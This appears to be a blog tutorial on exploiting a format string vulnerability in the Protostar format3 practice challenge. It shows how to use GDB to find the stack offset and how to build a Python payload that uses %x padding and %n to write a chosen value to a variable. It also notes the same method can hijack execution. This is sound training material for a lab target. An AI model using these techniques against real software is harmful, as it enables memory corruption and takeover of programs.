During our last adventure into the realm of format string exploitation, we learned how we can manipulate format specifiers to rewrite a program's memory with an arbitrary value. While that's all well and good, arbitrary values are boring. We want to gain full control over the values we write, and today we are going to learn how to do just that.
Before we continue, let's go back over what a format string is and how we can manipulate them. In the C programming language, a format string looks something like this:
printf( "We have %d dogs", 2 );
And will output something like this:
We have 2 dogs
In practice, format strings are a handy way programmers can organize the concatenation of strings and variables. Let's take a look at a more complicated format string:
char *person1 = "Bob";
char *person2 = "Alice";
int books = 15;
printf("%s and %s have %d books", person1,person2,books);
The format string is on the bottom line. Here we can see two symbols that should stick out as odd: %s and %d. These are format specifiers. When a running program comes across a format specifier, it knows to expect a variable to be passed in as a substitute for that format specifier. In the above example, the variables being substituted into the string are person1, person2, and books.
While format strings are indeed convenient, they are not always safe. If an attacker gives a format specifier as input to a program which doesn't properly sanitize that input, the program could be manipulated to read or write its own memory when it isn't supposed to. An attacker could potentially hijack execution of the entire program.
If you're still a little fuzzy on what exactly a format string is, pop back over to our last article on format string exploitation. There, you'll find a much more complete explanation and a practice lab you can follow along with.
Once you've re-familiarized yourself with format strings, it's time to once more embark into the war-torn world of Protostar. For those of you who are new to this exploit development series, Protostar is a virtual machine which we use to practice writing exploits.
After Protostar is all set up, it's time to dive into the format3 challenge hosted on the virtual machine. As always, the first thing we should do is take a look at the source code available at Exploit Exercises:
As we've seen in previous challenges, an integer variable called "target" is defined. I'd bet every dime I have that modifying this variable is going to have something to with our objective in this challenge. Looking at line 21, this is confirmed. We seem to be tasked with using a format string exploit to make the target variable hold the value "0x01025544."
Unlike the last challenge we walked through, this time we need to write a very specific value to the program memory. We'll worry about that part later though. For now, let's just focus on being able to write anything to memory.
The first thing we need to do is SSH into the virtual machine. This can be done with the username user and the password user. Once we're logged in, we'll open up the nano text editor by typing the following:
After that, we'll build a skeleton for our exploit by typing the code seen in the screenshot below.
Let's break this code down line by line.
- The first line is somewhat optional, all it does is let the operating system know that if it wants to execute this file, it needs to do so with Python. If you choose to omit this line, you can only run the program by typing python exploit.py in the command line.
- The next two lines import a couple packages that we will want to use, os and struct. The os package allows us to make system calls and run the format3 program from within our code. This way, we'll be able to start the vulnerable program and pass it our exploit code all from one place. The struct package allows us to write addresses such as 0x01025544 to variables in a format that the vulnerable program will understand easily.
- Jumping down a couple lines, the next thing we do in the program is define a main function that will run. Putting our exploit code into a function is optional, but recommended. Storing our exploit in a function helps to keep things organized and makes our exploit easy to call from other Python scripts.
- Inside of the function, we create a new variable called payload. This is the variable we will use to store our final exploit code. We give it an initial value of AAAA so that the payload is easy to find once we start trying to figure out where in memory that information is stored.
- On the next line, you'll find an arcane symbol, %x. Like %s or %d, %x is a format specifier. Like we saw in the last article, %x allows us to read program memory that we shouldn't be able to. While the other two aforementioned format specifiers also allow us to read program memory, %x presents the memory data in the most usable format. We add four copies of this format specifier to the payload so that we can figure out where in memory the program begins grabbing information to substitute into the string. Once we know where in memory this is occurring, we can determine how far we need to take that process in order to arrive at the memory location we want to be at.
As I mentioned in our last excursion into format strings, this sort of exploitation can seem very abstract at first. Don't worry, I promise that we'll lead you to the ... well ... the promised land. It just may take a little time.
In order to successfully take advantage of a format string exploit, we need to know two pieces of information: First, we need to know where our malicious format specifiers begin reading the memory. Once we know where we're starting, we need to figure out where in memory we are trying to get to. Once we know these two things, we can determine what it will take to get from point A to point B.
With this in mind, let's fire up the GNU debugger (GDB). To do this we type:
Once GDB has finished starting up, the first thing we need to do is set a breakpoint. This breakpoint will be the line of code that we want GDB to stop execution at once the line has been executed. Looking at the source code, line 20 seems to be a good candidate. This is because the vulnerable function on line 19 will have just finished executing. To set this breakpoint, we type:
With the breakpoint in place, we're ready to run the program. In order to run the program from within GDB, we type the following:
If you've read our previous articles on exploit development, this command may seem a bit barren. In the past, the run command has been accompanied by an argument specifying what input we wanted to pass into the program. This isn't how we pass input to the format3 program though. This is because instead of accepting a command line argument as input, format3 uses the fgets command in order to take user input. In this case, the command is similar to the input command in Python, which takes user input once the program has already begun execution.
Once the program is running, we'll see an empty prompt where we can enter whatever we want to be processed by the program. In this case, the string we'll be typing is AAAA.%x.%x.%x.%x. Once you finish typing that, hit Enter. At this point, your screen should look something like this:
Here we can see that we've hit the breakpoint we set earlier. The most interesting line is the first one below the string we typed. The line AAAA.0.bffff5c0.b7fd7ff4.0 has the information that we're going to need in order to figure out where in memory the format specifiers begin reading at. Now that we have that information, it's time to go hunting!
We'll start our prowl through these cyber woods with the current stack frame. If we're lucky, we'll find the same byte sequence in the stack frame as we saw printed by the program. Essentially, we're trying to find where in memory the sequence 0.bffff5c0.b7fd7ff4.0 appears.
To check the current stack frame, we type the following command:
The first x is short for "examine." This command allows us to examine memory, so the name is fitting. The /32 specifies that we want to examine the next 32 four-byte segments. The final x at the very end tells GDB that we want to view this section of memory in hexadecimal format. The last term, $esp, tells the command to start looking at memory at the very beginning of the current stack frame. Let's see what output we get from this command:
Aha! There's that rascal ... wait. It seems that the beast has eluded us thus far. While we see one of the memory sections we are looking for, the next two don't match. We are looking for 0.bffff5c0.b7fd7ff4.0 exactly in that order, with nothing in between.
What we do see, however, is the string itself. The memory address containing "0x41414141" is actually the hexadecimal representation of the 4 As we had at the beginning of our string. If we remember from our last excursion, in order to exploit a format string vulnerability, we need the program to begin reading memory at a lower address than where the string itself is stored. In this case, we see that the string is stored at 0xbffff5c0 (where the four As are), which means that the sequence we're looking for has to come before this address. With this in mind, let's start piecing through the lower memory addresses and see what we find. In order to do this, we'll type the following:
This command is nearly identical to the last command we ran. The only difference is that instead of reading 32 4-byte chunks of memory starting at the memory address of esp (also known as the stack pointer), we are starting at the address of esp minus 32 bytes. This means we'll be examining memory starting 32 bytes before the address of the stack pointer. Running this command results in the following output:
There it is! Our arduous search has paid off. We have found our prey. The format specifiers start reading at the location 0xbffff590. This is 12 sections of memory before our beloved As. This means we need 12 format specifiers in order to read memory we have the ability to write to.
Before we exit GDB, there's one more thing we need to know. In order to overwrite the contents of the target variable, we need to know where the heck that variable even is. To do this, we'll type:
The output of that command will show us the address of the target variable.
From the above output, we can see that the address of "target" is 0x80496f4. If we use the x command to examine this piece of memory, we see the current value at that memory address is 0. This is exactly what we would expect since "target" isn't given a value when it is declared in the source code.
Now that we have these two key pieces of information, the number of format specifiers we need and the address of the target variable, we can finish our exploit. Let's knock this bad boy out.
Let's open our exploit back up by typing the following:
The first thing we need to do is change the number of format specifiers that we're putting into our payload. Currently, we're only putting four format specifiers into the payload. We need to be building 12 into the payload. After we change this, our exploit should look something like this:
It's pretty much the same. We really don't want to change too much at one time though. This approach is called incremental development. The idea is that by coding and testing in small increments, we can minimize the amount of mistakes we make. While this may seem inefficient, it is significantly faster than trying to program a massive chunk of a project, making a mistake, and trying to dig through and find the mistake later.
Let's save our exploit as is and run it. We should see the following output:
Sweet. Just as we were hoping, the last format specifier read the very beginning of our payload. This doesn't do us any good if the beginning of our payload is just a bunch of As. As nice as a bunch of As can be, they don't do us much good when it comes to overwriting memory addresses.
So, what we need to do next is change our As to the address of target we found earlier. This can be easily done with the pack function in the struct package. By using this function, we can put the address of target into our payload in a format that the program can read correctly. Let's open up our exploit file again and make this change.
The change comes on line 7 with the struct.pack function. The first argument of struct.pack specifies that we want to package the information as an unsigned integer. We don't really need to worry about that too much, but it's good to know why we're doing what we're doing. The second argument is the information that we want to package. The struct.pack function returns a string, which we then append to the payload string variable.
Let's exit out and see what happens when we run the program now:
As we had prayed would happen, the last memory address we read is the address of the target variable, 0x80496f4.
Now that we know that the last piece of data we're reading contains the address of the target variable, we can move on to writing data.
The way we do this is with the %n format specifier. Like the %x format specifier, the %n format specifier reads a piece of data from memory. Unlike %x, %n does not display the memory that it reads. Instead, it writes the length of the string up to that point. Where does this data get written to? Why the address equivalent to the value that was read, of course.
Essentially this means that if we want to write data to the value of the target variable, we need the %n format specifier to read a chunk of memory with the address of that variable. Our exploit should look something like this now:
In this version of the exploit, we replace the last %x format specifier with a %n format specifier. Now, instead of simply printing the address of the target variable to the screen, this exploit should grab the address of the target variable and write some data to that address. Let's see if it works:
Alright! Now we're cooking with peanut oil. While we still have a frowny face, we are on the cusp of turning said frown upside down. We've managed to write some data to the target variable. Instead of having a value of 0, we now have a hexadecimal value of 4c. This is still a long way away from 01025544 though. If we do 01025544 - 0000004c, we get a non-hexadecimal value of 16930040. This means that we need our string to be 16930040 characters longer in order to write the correct value. That sure is a lot of As
Luckily, there's a more elegant solution. Instead of adding payload+="A"*16930040 to our program, we can do this:
The change should be fairly obvious. Our last format specifier went from being %x to %16930040x. Having a number in the middle of a format specifier determines how much padding should be printed with the variable. For instance, the following code would print out "Hello Steve" with five extra spaces between "Hello" and "Steve."
char* person = "Steve";
These extra padding characters are counted as a part of the length of the string. This means that by padding the last %x format specifier with 16930040, it should give us the correct string length we need to write "01025544" to the target variable. Let's try it out!
Well, we're certainly a lot closer. It looks like we still need 8 more bytes in our string to get to the magic number. This is because we set the last format specifier to have a total length of 16930040 bytes. That format specifier was already giving us a string that is 8 bytes long. This means we were only adding 16930032 bytes to the length of the entire string. Oops. This is an easy fix though. All we have to do is change %16930040x to %16930048x. This will give us the correct number of bytes to overwrite the target variable with the value we want.
And just like a mediocre comedian, we were able to turn that frown into a vaguely approving smile.
Despite the anticlimactic response from the program, the implications of format string vulnerabilities can be quite damaging. In this particular example, all we did was overwrite a variable. However, we could very easily use this sort of vulnerability to overwrite the programs instruction pointer to execute shellcode like we did when we worked through the stack overflow challenges. Format string vulnerabilities have the potential to be just as dangerous as stack overflow vulnerabilities.
Thank you for reading! Congratulations on making it through the slow grind of format string exploitation. Being able to think through these kinds of problems will really help your critical thinking in all areas of computer science, so good on you. Comment below with any questions or contact me via Twitter @xAllegiance.